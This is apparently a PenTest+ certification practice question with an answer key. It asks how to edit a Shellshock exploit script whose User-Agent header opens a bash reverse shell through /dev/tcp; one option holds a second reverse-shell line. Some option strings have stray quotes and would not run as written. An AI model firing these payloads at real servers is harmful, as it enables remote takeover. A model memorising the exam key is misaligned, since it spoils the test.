CompTIA PenTest+ (PT1-002) — Question 43
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:
exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
Answer options
- A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
- B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
- C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
- D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
Correct answer: A
Explanation
The correct answer is A because it executes commands that directly identify the user context using 'id;whoami'. The other options either do not provide user context information or execute irrelevant commands that do not help in identifying the user context.